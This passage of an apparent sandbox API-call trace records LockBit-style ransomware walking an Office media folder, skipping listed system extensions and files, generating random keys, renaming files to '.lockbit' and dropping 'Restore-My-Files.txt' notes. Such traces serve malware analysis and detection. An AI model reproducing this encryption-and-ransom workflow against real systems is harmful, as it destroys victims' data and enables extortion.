param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.424] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.424] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf17ef00, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbccbe2a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdf17ef00, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0x142e, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18250_.WMF", cAlternateFileName="")) returned 1 [0202.424] lstrcmpiW (lpString1=".", lpString2="BD18250_.WMF") returned -1 [0202.424] lstrcmpiW (lpString1="..", lpString2="BD18250_.WMF") returned -1 [0202.424] PathFindExtensionW (pszPath="BD18250_.WMF") returned=".WMF" [0202.424] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.424] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.425] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.425] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18250_.WMF") returned 1 [0202.426] lstrcmpiW (lpString1="ntldr", lpString2="BD18250_.WMF") returned 1 [0202.426] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18250_.WMF") returned 1 [0202.426] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18250_.WMF") returned 1 [0202.426] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18250_.WMF") returned -1 [0202.426] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18250_.WMF") returned 1 [0202.426] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18250_.WMF") returned 1 [0202.426] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.426] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF") returned=".WMF" [0202.426] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.426] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.426] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.427] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.427] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF.lockbit") returned 79 [0202.427] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18250_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.430] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.430] malloc (_Size=0x40068) returned 0x3df0008 [0202.430] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5166) returned 1 [0202.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.430] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.430] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.430] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.431] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.431] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.431] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0202.435] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.435] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.435] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0202.439] free (_Block=0x1fa2ed8) [0202.439] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18250_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.439] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.440] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefc86500, ftCreationTime.dwHighDateTime=0x1bdcf21, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xefc86500, ftLastWriteTime.dwHighDateTime=0x1bdcf21, nFileSizeHigh=0x0, nFileSizeLow=0x90c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18251_.WMF", cAlternateFileName="")) returned 1 [0202.440] lstrcmpiW (lpString1=".", lpString2="BD18251_.WMF") returned -1 [0202.440] lstrcmpiW (lpString1="..", lpString2="BD18251_.WMF") returned -1 [0202.440] PathFindExtensionW (pszPath="BD18251_.WMF") returned=".WMF" [0202.440] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.440] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.441] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.441] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18251_.WMF") returned 1 [0202.442] lstrcmpiW (lpString1="ntldr", lpString2="BD18251_.WMF") returned 1 [0202.442] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18251_.WMF") returned 1 [0202.442] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18251_.WMF") returned 1 [0202.442] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18251_.WMF") returned -1 [0202.442] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18251_.WMF") returned 1 [0202.442] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18251_.WMF") returned 1 [0202.442] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.442] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF") returned=".WMF" [0202.442] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.442] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0202.442] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0202.443] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0202.443] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF.lockbit") returned 79 [0202.443] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18251_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0202.445] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0202.445] malloc (_Size=0x40068) returned 0x3df0008 [0202.445] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=2316) returned 1 [0202.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.445] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.445] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0202.445] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0202.446] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0202.446] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0202.446] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0202.451] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0202.451] malloc (_Size=0xb4) returned 0x1fa2ed8 [0202.451] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xb4, FileInformationClass=0xa) returned 0xc0000008 [0202.451] free (_Block=0x1fa2ed8) [0202.451] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18251_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP") returned 1 [0202.451] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt") returned 79 [0202.451] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0202.451] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8ec2300, ftCreationTime.dwHighDateTime=0x1bdcf1e, ftLastAccessTime.dwLowDateTime=0xbcce4400, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe8ec2300, ftLastWriteTime.dwHighDateTime=0x1bdcf1e, nFileSizeHigh=0x0, nFileSizeLow=0x756, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD18252_.WMF", cAlternateFileName="")) returned 1 [0202.451] lstrcmpiW (lpString1=".", lpString2="BD18252_.WMF") returned -1 [0202.451] lstrcmpiW (lpString1="..", lpString2="BD18252_.WMF") returned -1 [0202.451] PathFindExtensionW (pszPath="BD18252_.WMF") returned=".WMF" [0202.451] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0202.451] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0202.451] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0202.451] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0202.451] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0202.452] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0202.452] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0202.453] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD18252_.WMF") returned 1 [0202.453] lstrcmpiW (lpString1="ntldr", lpString2="BD18252_.WMF") returned 1 [0202.453] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD18252_.WMF") returned 1 [0202.453] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD18252_.WMF") returned 1 [0202.453] lstrcmpiW (lpString1="autorun.inf", lpString2="BD18252_.WMF") returned -1 [0202.453] lstrcmpiW (lpString1="thumbs.db", lpString2="BD18252_.WMF") returned 1 [0202.453] lstrcmpiW (lpString1="iconcache.db", lpString2="BD18252_.WMF") returned 1 [0202.453] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\") returned="" [0202.453] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18252_.WMF") returned=".WMF" [0202.454] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0202.454] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0202.454] lstrcmpiW 